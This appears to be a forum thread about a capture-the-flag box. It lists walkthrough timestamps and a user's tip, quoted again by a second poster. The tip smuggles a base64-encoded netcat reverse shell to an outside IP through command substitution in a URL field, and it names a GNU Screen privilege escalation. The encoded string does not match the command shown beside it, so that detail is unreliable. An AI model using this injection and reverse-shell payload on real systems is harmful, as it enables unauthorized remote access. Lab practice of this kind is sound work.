01:45 - GoBuster: Discover exposed.php
04:40 - Exploiting exposed.php: Curl Argument Injection
11:40 - Getting Shell: nc, python3 to import pty.
20:09 - Screen Privesc: GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit
Saw your video, nice walkthrough. That bug with gcc where you had to modify the PATH had me scratching my head.
I thought some might be interested in how I did the initial shell.
Might be useful if you can't find a web app folder where you can write.
- base64 encode your shell command for the reverse shell, i.e.
  echo "nc -c /bin/sh 10.10.15.152 4444" | base64
  → bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo=
- send the request with the field populated as such:
  http://localhost/test.html$($(echo bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= |base64 -d))
- enjoy your shell
If | is not allowed in the payload, you can first write to some file in /tmp and then decode that file afterwards.
Hope some find it useful.
@sajkox said:
I thought some might be interested in how I did the initial shell.
Might be useful if you can't find a web app folder where you can write.
- base64 encode your shell command for the reverse shell, i.e.
  echo "nc -c /bin/sh 10.10.15.152 4444" | base64
  → bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo=
- send the request with the field populated as such:
  http://localhost/test.html$($(echo bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= |base64 -d))
- enjoy your shell
If | is not allowed in the payload, you can first write to some file in /tmp and then decode that file afterwards.
Hope some find it useful.
Great info! Thanks for the tip.